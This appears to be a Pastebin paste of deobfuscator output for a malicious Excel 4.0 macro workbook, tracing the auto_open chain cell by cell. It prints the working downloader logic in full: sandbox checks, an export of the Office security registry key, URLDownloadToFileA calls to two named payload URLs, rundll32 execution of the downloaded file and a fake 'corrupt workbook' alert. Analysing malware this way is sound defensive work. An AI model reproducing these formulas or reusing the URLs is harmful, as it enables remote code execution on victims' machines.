API tools faq
paste
Advertisement
dissectmalware

8a6

dissectmalware
May 18th, 2020
332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.78 KB | None | 0 0
raw download clone embed print report
  1. auto_open: auto_open->Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!$AG$4609
  2. [Starting Deobfuscation]
  3. CELL:AG4609 , FullEvaluation ,FORMULA.FILL("-19.4",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!J47428)
  4. CELL:AG4610 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!P1757)
  5. CELL:P1757 , FullEvaluation ,FORMULA.FILL("103.5",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ5126)
  6. CELL:P1758 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW28226)
  7. CELL:AW28226 , FullEvaluation ,FORMULA.FILL("24",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV27471)
  8. CELL:AW28227 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CX1185)
  9. CELL:CX1185 , FullEvaluation ,FORMULA.FILL("125",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GS53177)
  10. CELL:CX1186 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IN52324)
  11. CELL:IN52324 , FullEvaluation ,FORMULA.FILL("-49.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EP63404)
  12. CELL:IN52325 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU23026)
  13. CELL:DU23026 , FullEvaluation ,FORMULA.FILL("-432.25",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CS18382)
  14. CELL:DU23027 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HQ54667)
  15. CELL:HQ54667 , FullEvaluation ,FORMULA.FILL("-431",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AI56425)
  16. CELL:HQ54668 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BA29292)
  17. CELL:BA29292 , FullEvaluation ,FORMULA.FILL("208",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EP49854)
  18. CELL:BA29293 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IN10715)
  19. CELL:IN10715 , FullEvaluation ,FORMULA.FILL("16.6",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DW30235)
  20. CELL:IN10716 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CC50114)
  21. CELL:CC50114 , FullEvaluation ,FORMULA.FILL("45",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AU21703)
  22. CELL:CC50115 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV26230)
  23. CELL:HV26230 , FullEvaluation ,FORMULA.FILL("204",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!T44829)
  24. CELL:HV26231 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FK46285)
  25. CELL:FK46285 , FullEvaluation ,FORMULA.FILL("257",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU1459)
  26. CELL:FK46286 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IT54104)
  27. CELL:IT54104 , FullEvaluation ,FORMULA.FILL("147.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EN33239)
  28. CELL:IT54105 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FZ31102)
  29. CELL:FZ31102 , FullEvaluation ,FORMULA.FILL("300",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DY25916)
  30. CELL:FZ31103 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HK46610)
  31. CELL:HK46610 , FullEvaluation ,FORMULA.FILL("64",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EB18916)
  32. CELL:HK46611 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FU9381)
  33. CELL:FU9381 , FullEvaluation ,FORMULA.FILL("101",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AM52178)
  34. CELL:FU9382 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AL40024)
  35. CELL:AL40024 , FullEvaluation ,FORMULA.FILL("-180.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DJ50650)
  36. CELL:AL40025 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DR50223)
  37. CELL:DR50223 , FullEvaluation ,FORMULA.FILL("-80",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EZ41859)
  38. CELL:DR50224 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!A61465)
  39. CELL:A61465 , FullEvaluation ,FORMULA.FILL("-380",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BV5310)
  40. CELL:A61466 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BE23997)
  41. CELL:BE23997 , FullEvaluation ,FORMULA.FILL("-578",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC31490)
  42. CELL:BE23998 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AK47754)
  43. CELL:AK47754 , FullEvaluation ,FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EY35505)
  44. CELL:AK47755 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BN5637)
  45. CELL:BN5637 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BU5841)
  46. CELL:BN5638 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL25607)
  47. CELL:GL25607 , FullEvaluation ,FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS2095)
  48. CELL:GL25608 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BW23350)
  49. CELL:BW23350 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS838)
  50. CELL:BW23351 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HQ9091)
  51. CELL:HQ9091 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CB2526)
  52. CELL:HQ9092 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BC65215)
  53. CELL:BC65215 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CN32845)
  54. CELL:BC65216 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!N59953)
  55. CELL:N59953 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!U21055)
  56. CELL:N59954 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HK40654)
  57. CELL:HK40654 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL41507)
  58. CELL:HK40655 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CF37393)
  59. CELL:CF37393 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EU17908)
  60. CELL:CF37394 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FW23082)
  61. CELL:FW23082 , FullEvaluation ,FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE8598)
  62. CELL:FW23083 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DN34043)
  63. CELL:DN34043 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\3ubDcx.reg""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DB23252)
  64. CELL:DN34044 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EZ34143)
  65. CELL:EZ34143 , FullEvaluation ,FORMULA.FILL("=R[-10969]C[-18]&GET.WORKSPACE(2)&""\Excel\Security ""&R[3685]C[5]&"" /y""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CW19567)
  66. CELL:EZ34144 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GZ20828)
  67. CELL:GZ20828 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HW60470)
  68. CELL:GZ20829 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CT59787)
  69. CELL:CT59787 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[39911]C[-22],R[-992]C[-152],0,5)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IS20559)
  70. CELL:CT59788 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FH7265)
  71. CELL:FH7265 , FullEvaluation ,FORMULA.FILL("=WHILE(ISERROR(FILES(R[-26287]C[-72])))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49539)
  72. CELL:FH7266 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HI35007)
  73. CELL:HI35007 , FullEvaluation ,FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49540)
  74. CELL:HI35008 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HO35474)
  75. CELL:HO35474 , FullEvaluation ,FORMULA.FILL("=NEXT()",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49541)
  76. CELL:HO35475 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HU5719)
  77. CELL:HU5719 , FullEvaluation ,FORMULA.FILL("=""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC65423)
  78. CELL:HU5720 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CH4760)
  79. CELL:CH4760 , FullEvaluation ,FORMULA.FILL("=""http://theislandmen.com/wp-smart.php""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!G56096)
  80. CELL:CH4761 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IC41305)
  81. CELL:IC41305 , FullEvaluation ,FORMULA.FILL("=FOPEN(R[-31159]C[-9])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DK54411)
  82. CELL:IC41306 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FR64405)
  83. CELL:FR64405 , FullEvaluation ,FORMULA.FILL("=FPOS(R[28056]C[-119],215)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ26355)
  84. CELL:FR64406 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FP48504)
  85. CELL:FP48504 , FullEvaluation ,FORMULA.FILL("=FREAD(R[-2685]C[-83],255)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GP57096)
  86. CELL:FP48505 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AD42538)
  87. CELL:AD42538 , FullEvaluation ,FORMULA.FILL("=FCLOSE(R[-3110]C[-84])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ57521)
  88. CELL:AD42539 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EK15074)
  89. CELL:EK15074 , FullEvaluation ,FORMULA.FILL("=FILE.DELETE(R[-17443]C[75])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AE40695)
  90. CELL:EK15075 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GB4920)
  91. CELL:GB4920 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-6135]C[4])),CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL63231)
  92. CELL:GB4921 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FG18856)
  93. CELL:FG18856 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\iTuTkLL.html""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE12504)
  94. CELL:FG18857 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BE33857)
  95. CELL:BE33857 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-55410]C[-86],R[-45001]C[-74],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FA57505)
  96. CELL:BE33858 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU10606)
  97. CELL:DU10606 , FullEvaluation ,FORMULA.FILL("=FILES(R[-4582]C[34])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW17086)
  98. CELL:DU10607 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CO25990)
  99. CELL:CO25990 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[-31215]C[-181]),CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV48301)
  100. CELL:CO25991 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GD42294)
  101. CELL:GD42294 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\ieWn8FXU.html""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!ER20373)
  102. CELL:GD42295 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ40890)
  103. CELL:GQ40890 , FullEvaluation ,FORMULA.FILL("=R[-38146]C[-91]&"",DllRegisterServer""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IE58519)
  104. CELL:GQ40891 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EF57495)
  105. CELL:EF57495 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[25011]C[-20],R[-20039]C[99],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW40412)
  106. CELL:EF57496 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DF12742)
  107. CELL:DF12742 , FullEvaluation ,FORMULA.FILL("=FILES(R[295]C[142])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!F20078)
  108. CELL:DF12743 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DL31167)
  109. CELL:DL31167 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[-20753]C[-131]),,RUN(R[-3649]C[15]))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EG40831)
  110. CELL:DL31168 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BT26772)
  111. CELL:BT26772 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[31449]C[-135],R[-4274]C[6],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL24647)
  112. CELL:BT26773 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CI19987)
  113. CELL:CI19987 , FullEvaluation ,FORMULA.FILL("=ALERT(R[-1677]C[3],2)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
  114. CELL:CI19988 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CX37204)
  115. CELL:CX37204 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-33829]C[-18],R[18849]C[148],0,5)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
  116. CELL:CX37205 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GO64254)
  117. CELL:GO64254 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
  118. CELL:GO64255 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EY35505)
  119. CELL:EY35505 , FullEvaluation ,"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  120. CELL:EY35506 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BU5841)
  121. CELL:BU5841 , FullEvaluation ,"C:\Windows\system32\rundll32.exe"
  122. CELL:BU5842 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS2095)
  123. CELL:BS2095 , FullEvaluation ,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
  124. CELL:BS2096 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS838)
  125. CELL:BS838 , NotImplemented ,APP.MAXIMIZE()
  126. CELL:BS839 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CB2526)
  127. CELL:CB2526 , FullBranching ,IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
  128. CELL:CB2526 , End ,[TRUE] CLOSE(FALSE)
  129. CELL:CB2526 , FullEvaluation ,[FALSE]
  130. CELL:CB2527 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CN32845)
  131. CELL:CN32845 , FullBranching , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
  132. CELL:CN32845 , End , [TRUE] CLOSE(FALSE)
  133. CELL:CN32845 , FullEvaluation , [FALSE]
  134. CELL:CN32846 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!U21055)
  135. CELL:U21055 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  136. CELL:U21056 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL41507)
  137. CELL:EL41507 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  138. CELL:EL41508 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EU17908)
  139. CELL:EU17908 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
  140. CELL:EU17909 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE8598)
  141. CELL:CE8598 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
  142. CELL:CE8599 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DB23252)
  143. CELL:DB23252 , FullEvaluation , "C:\Users\Public\3ubDcx.reg"
  144. CELL:DB23253 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CW19567)
  145. CELL:CW19567 , FullEvaluation , EXPORT HKCU\Software\Microsoft\Office\"GET.WORKSPACE(2)\Excel\Security "C:\Users\Public\3ubDcx.reg /y
  146. CELL:CW19568 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HW60470)
  147. CELL:HW60470 , FullEvaluation , "C:\Windows\system32\reg.exe"
  148. CELL:HW60471 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IS20559)
  149. CELL:IS20559 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\reg.exe""","EXPORT HKCU\Software\Microsoft\Office\""GET.WORKSPACE(2)\Excel\Security ""C:\Users\Public\3ubDcx.reg /y",0,5)
  150. CELL:IS20560 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49539)
  151. CELL:FV49539 , PartialEvaluation , WHILE("""C:\Users\Public\3ubDcx.reg""")
  152. CELL:FV49540 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  153. CELL:FV49541 , PartialEvaluation , NEXT()
  154. CELL:FV49542 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC65423)
  155. CELL:AC65423 , FullEvaluation , "http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php"
  156. CELL:AC65424 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!G56096)
  157. CELL:G56096 , FullEvaluation , "http://theislandmen.com/wp-smart.php"
  158. CELL:G56097 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DK54411)
  159. CELL:DK54411 , PartialEvaluation , FOPEN("""C:\Users\Public\3ubDcx.reg""")
  160. CELL:DK54412 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ26355)
  161. CELL:HZ26355 , PartialEvaluation , FPOS("""""""C:\Users\Public\3ubDcx.reg""""""",215)
  162. CELL:HZ26356 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GP57096)
  163. CELL:GP57096 , PartialEvaluation , FREAD("""""""C:\Users\Public\3ubDcx.reg""""""",255)
  164. CELL:GP57097 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ57521)
  165. CELL:GQ57521 , PartialEvaluation , FCLOSE("""""""C:\Users\Public\3ubDcx.reg""""""")
  166. CELL:GQ57522 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AE40695)
  167. CELL:AE40695 , NotImplemented , FILE.DELETE(R[-17443]C[75])
  168. CELL:AE40696 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL63231)
  169. CELL:GL63231 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-6135]C[4])),CLOSE(FALSE),)
  170. CELL:GL63232 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE12504)
  171. CELL:CE12504 , FullEvaluation , "C:\Users\Public\iTuTkLL.html"
  172. CELL:CE12505 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FA57505)
  173. CELL:FA57505 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","""C:\Users\Public\iTuTkLL.html""",0,0)
  174. CELL:FA57506 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW17086)
  175. CELL:AW17086 , PartialEvaluation , FILES("""C:\Users\Public\iTuTkLL.html""")
  176. CELL:AW17087 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV48301)
  177. CELL:HV48301 , FullBranching , IF(ISERROR(R[-31215]C[-181]),CLOSE(FALSE),)
  178. CELL:HV48301 , End , [TRUE] CLOSE(FALSE)
  179. CELL:HV48301 , FullEvaluation , [FALSE]
  180. CELL:HV48302 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!ER20373)
  181. CELL:ER20373 , FullEvaluation , "C:\Users\Public\ieWn8FXU.html"
  182. CELL:ER20374 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IE58519)
  183. CELL:IE58519 , FullEvaluation , "C:\Users\Public\ieWn8FXU.html",DllRegisterServer
  184. CELL:IE58520 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW40412)
  185. CELL:AW40412 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""","""C:\Users\Public\ieWn8FXU.html""",0,0)
  186. CELL:AW40413 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!F20078)
  187. CELL:F20078 , PartialEvaluation , FILES("""C:\Users\Public\ieWn8FXU.html""")
  188. CELL:F20079 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EG40831)
  189. CELL:EG40831 , FullBranching , IF(ISERROR(R[-20753]C[-131]),,RUN(R[-3649]C[15]))
  190. CELL:EG40831 , FullEvaluation , [TRUE]
  191. CELL:EG40832 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL24647)
  192. CELL:EL24647 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://theislandmen.com/wp-smart.php""","""C:\Users\Public\ieWn8FXU.html""",0,0)
  193. CELL:EL24648 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
  194. CELL:EV37182 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
  195. CELL:EV37183 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
  196. CELL:CM39670 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\ieWn8FXU.html"",DllRegisterServer",0,5)
  197. CELL:CM39671 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
  198. CELL:FJ6373 , End , CLOSE(FALSE)
  199. CELL:EG40831 , FullEvaluation , [FALSE] RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
  200. CELL:EV37182 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
  201. CELL:EV37183 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
  202. CELL:CM39670 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\ieWn8FXU.html"",DllRegisterServer",0,5)
  203. CELL:CM39671 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
  204. CELL:FJ6373 , End , CLOSE(FALSE)
  205. time elapsed: 6.086402177810669
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!